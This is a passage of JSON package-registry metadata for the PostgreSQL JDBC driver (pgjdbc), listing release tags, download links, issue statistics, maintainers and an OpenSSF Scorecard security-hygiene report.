github/pgjdbc/pgjdbc@REL7_2_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3/manifests"},{"name":"REL7_2_BETA2","sha":"42c01a77e1e0be5f5b2d631fef5b3d46c2dbb7c2","kind":"commit","published_at":"2001-11-02T23:51:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2/manifests"},{"name":"REL7_2_BETA1","sha":"72a1e406d24746a658be7672b311a73bb3d815a3","kind":"commit","published_at":"2001-10-25T06:00:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1/manifests"},{"name":"REL7_1_2","sha":"78eb5549506b35d6bd13b915f34c49ec604f1f7c","kind":"commit","published_at":"2001-05-12T20:45:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2/manifests"},{"name":"REL7_1","sha":"2c56fd4ae7a9e300c5c5bba754659949874af2c2","kind":"commit","published_at":"2001-03-19T21:57:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1/manifests"},{"name":"REL7_1_BETA3","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3/manifests"},{"name":"REL7_1_BETA2","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2/manifests"},{"name":"REL7_1_BETA","sha":"422287392124727a6d1520a004d6892449c3474c","kind":"commit","published_at":"2000-11-25T04:32:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA/manifests"},{"name":"REL7_0","sha":"00659bf1e495de76b0444a0baecb12516526595d","kind":"commit","published_at":"2000-05-05T07:35:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0/manifests"},{"name":"REL6_5","sha":"a82d23e5c013587296f807ff3886359fd4941f96","kind":"commit","published_at":"1999-06-27T11:05:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL6_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL6_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL6_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5/manifests"},{"name":"release-6-3","sha":"121396c2d9ba689d98fe0837be59ce628ae62c0e","kind":"commit","published_at":"1998-02-22T18:03:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/release-6-3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/release-6-3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@release-6-3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3/manifests"}]},"repo_metadata_updated_at":"2026-03-15T13:13:53.923Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":2,"rankings":{"downloads":null,"dependent_repos_count":16.115688414139694,"dependent_packages_count":50.15146812962388,"stargazers_count":10.616563151972386,"forks_count":6.4499465407671694,"docker_downloads_count":null,"average":20.833416559125784},"purl":"pkg:maven/org.postgresql/pgjdbc-benchmark","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.postgresql:pgjdbc-benchmark","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.postgresql:pgjdbc-benchmark","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.postgresql:pgjdbc-benchmark/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-15T10:03:57.509Z","issues_count":355,"pull_requests_count":1106,"avg_time_to_close_issue":21320116.11678832,"avg_time_to_close_pull_request":4714478.739514349,"issues_closed_count":136,"pull_requests_closed_count":906,"pull_request_authors_count":132,"issue_authors_count":270,"avg_comments_per_issue":4.892957746478873,"avg_comments_per_pull_request":1.8824593128390597,"merged_pull_requests_count":761,"bot_issues_count":2,"bot_pull_requests_count":46,"past_year_issues_count":63,"past_year_pull_requests_count":348,"past_year_avg_time_to_close_issue":852687.9047619047,"past_year_avg_time_to_close_pull_request":365465.76,"past_year_issues_closed_count":21,"past_year_pull_requests_closed_count":275,"past_year_pull_request_authors_count":29,"past_year_issue_authors_count":53,"past_year_avg_comments_per_issue":2.3333333333333335,"past_year_avg_comments_per_pull_request":0.7097701149425287,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":3,"past_year_merged_pull_requests_count":254,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/issues","maintainers":[{"login":"davecramer","count":194,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"vlsi","count":167,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"jorsol","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"sehrope","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"ringerc","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ringerc"},{"login":"bokken","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bokken"},{"login":"praiskup","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"},{"login":"pyup-bot","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pyup-bot"}],"active_maintainers":[{"login":"vlsi","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"davecramer","count":46,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"sehrope","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"jorsol","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"praiskup","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-benchmark/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-benchmark/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-benchmark/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-benchmark/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-benchmark/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-benchmark/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":608482,"maintainers_count":0,"namespaces_count":80807,"keywords_count":34879,"github":"maven-central","metadata":{"funded_packages_count":37828},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-06-10T05:05:55.821Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":4610947,"name":"postgresql","ecosystem":"clojars","description":"The PostgreSQL JDBC Driver JDBC41","homepage":"http://jdbc.postgresql.org/","licenses":"BSD License","normalized_licenses":["BSD-3-Clause"],"repository_url":"https://github.com/pgjdbc/pgjdbc","keywords_array":[],"namespace":"postgresql","versions_count":5,"first_release_published_at":"2020-02-10T08:07:38.000Z","latest_release_published_at":"2020-02-10T08:07:39.000Z","latest_release_number":"9.3-1102.jdbc41","last_synced_at":"2026-06-18T23:01:14.954Z","created_at":"2022-07-22T14:21:11.936Z","updated_at":"2026-06-18T23:05:12.979Z","registry_url":"https://clojars.org/postgresql/","install_command":null,"documentation_url":"https://cljdoc.org/d/postgresql/","metadata":{},"repo_metadata":{"id":2402865,"uuid":"3370128","full_name":"pgjdbc/pgjdbc","owner":"pgjdbc","description":"Postgresql JDBC Driver","archived":false,"fork":false,"pushed_at":"2026-06-10T19:59:51.000Z","size":48369,"stargazers_count":1719,"open_issues_count":631,"forks_count":930,"subscribers_count":78,"default_branch":"master","last_synced_at":"2026-06-12T04:24:30.788Z","etag":null,"topics":["java","jdbc","postgresql"],"latest_commit_sha":null,"homepage":"https://jdbc.postgresql.org/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pgjdbc.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2012-02-06T19:30:35.000Z","updated_at":"2026-06-10T19:59:55.000Z","dependencies_parsed_at":"2023-07-05T17:00:15.760Z","dependency_job_id":"3f4ac789-9a1d-4707-8473-760c8cd0eab5","html_url":"https://github.com/pgjdbc/pgjdbc","commit_stats":{"total_commits":3390,"total_committers":332,"mean_commits":"10.210843373493976","dds":0.8300884955752212,"last_synced_commit":"cf3d8e5ed1bca96873735a8731ed4082132361a5"},"previous_names":[],"tags_count":257,"template":false,"template_full_name":null,"purl":"pkg:github/pgjdbc/pgjdbc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/sbom","scorecard":{"id":355355,"data":{"date":"2025-08-18T08:41:38Z","repo":{"name":"github.com/pgjdbc/pgjdbc","commit":"0002d4b2e9de28af0fe0e63a5821f65ed23e245b"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":7.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 26/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 19 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'packages' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:43","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:44","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/gradle-dependency-submit.yaml:18","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release-drafter.yml:22","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:18","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/release.yml:21","Info: topLevel 'contents' permission set to 'read': .github/workflows/buildcache.yml:13","Info: topLevel permissions set to 'read-all': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/debezium.yml:7","Info: topLevel 'contents' permission set to 'read': .github/workflows/fedora-copr-build.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/gradle-dependency-submit.yaml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/gradle-wrapper-validation.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:25","Info: topLevel 'contents' permission set to 'read': .github/workflows/nightlysnapshot.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/omni.yml:39","Info: topLevel permissions set to 'read-all': .github/workflows/ossf-scorecard.yaml:20","Info: topLevel permissions set to 'read-all': .github/workflows/pgp-key-maintenance.yaml:6","Info: topLevel permissions set to 'read-all': .github/workflows/release-drafter.yml:12","Warn: no topLevel permission defined: .github/workflows/release.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:152","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:199","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:228","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:235","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:253","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:263","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:272","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:289","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:297","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:312","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:326","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:330","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:344","Warn: downloadThenRun not pinned by hash: .github/workflows/fedora-copr-build.yml:33","Info:  42 out of  42 GitHub-owned GitHubAction dependencies pinned","Info:  20 out of  20 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact REL42.7.7 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423","Warn: release artifact REL42.7.7 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: BSD 2-Clause \"Simplified\" License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":3,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'master'","Info: 'allow deletion' disabled on branch 'release/42.5.x'","Info: 'allow deletion' disabled on branch 'release/42.4.x'","Info: 'allow deletion' disabled on branch 'release/42.3.x'","Info: 'force pushes' disabled on branch 'master'","Info: 'force pushes' disabled on branch 'release/42.5.x'","Info: 'force pushes' disabled on branch 'release/42.4.x'","Info: 'force pushes' disabled on branch 'release/42.3.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'master'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.5.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.4.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.3.x'","Warn: 'stale review dismissal' is disabled on branch 'master'","Warn: 'stale review dismissal' is disabled on branch 'release/42.5.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.4.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.3.x'","Warn: branch 'master' does not require approvers","Warn: branch 'release/42.5.x' does not require approvers","Warn: branch 'release/42.4.x' does not require approvers","Warn: branch 'release/42.3.x' does not require approvers","Warn: codeowners review is not required on branch 'master'","Warn: codeowners review is not required on branch 'release/42.5.x'","Warn: codeowners review is not required on branch 'release/42.4.x'","Warn: codeowners review is not required on branch 'release/42.3.x'","Warn: 'last push approval' is disabled on branch 'master'","Warn: 'last push approval' is disabled on branch 'release/42.5.x'","Warn: 'last push approval' is disabled on branch 'release/42.4.x'","Warn: 'last push approval' is disabled on branch 'release/42.3.x'","Warn: 'up-to-date branches' is disabled on branch 'master'","Warn: 'up-to-date branches' is disabled on branch 'release/42.5.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.4.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.3.x'","Info: status check found to merge onto on branch 'master'","Info: status check found to merge onto on branch 'release/42.5.x'","Info: status check found to merge onto on branch 'release/42.4.x'","Info: status check found to merge onto on branch 'release/42.3.x'","Info: PRs are required in order to make changes on branch 'master'","Info: PRs are required in order to make changes on branch 'release/42.5.x'","Info: PRs are required in order to make changes on branch 'release/42.4.x'","Info: PRs are required in order to make changes on branch 'release/42.3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 34 contributing companies or organizations","details":["Info: found contributions from: 2ndQuadrant, AXLEproject, JavaMoney, altametris, autostyle, aws, cerner, csutils, devexp-db, edb, enterprisedb, fedora-copr, gnulib-modules, jackdb, jugnicaragua, konflux-ci, libusual, lonocloud, mend, mojohaus, netceteragroup, netcracker, ngs-doo, oracle, pgbouncer, pgjdbc, postgres, python-progress, redhatofficial, release-engineering, roiai-org, rpm-software-management, w4software, yandex"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-18T09:24:36.671Z","repository_id":2402865,"created_at":"2025-08-18T09:24:36.672Z","updated_at":"2025-08-18T09:24:36.672Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34510325,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-18T02:00:06.871Z","response_time":128,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pgjdbc","name":"Postgresql JDBC","uuid":"1371956","kind":"organization","description":"Official JDBC driver for PostgreSQL","email":"pgsql-jdbc@postgresql.org","website":"http://jdbc.postgresql.org","location":"Canada","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/1371956?v=4","repositories_count":12,"last_synced_at":"2025-05-18T13:01:52.520Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/pgjdbc","funding_links":[],"total_stars":2714,"followers":80,"following":0,"created_at":"2022-11-03T09:29:51.190Z","updated_at":"2025-05-18T13:01:52.520Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc/repositories"},"tags":[{"name":"REL42.7.11","sha":"78e261ff2a7f16a37bdceb2204f67e484387da2f","kind":"commit","published_at":"2026-04-28T20:00:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.11","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.11/manifests"},{"name":"REL42.7.10","sha":"27571c8e18712e7fc6a007bd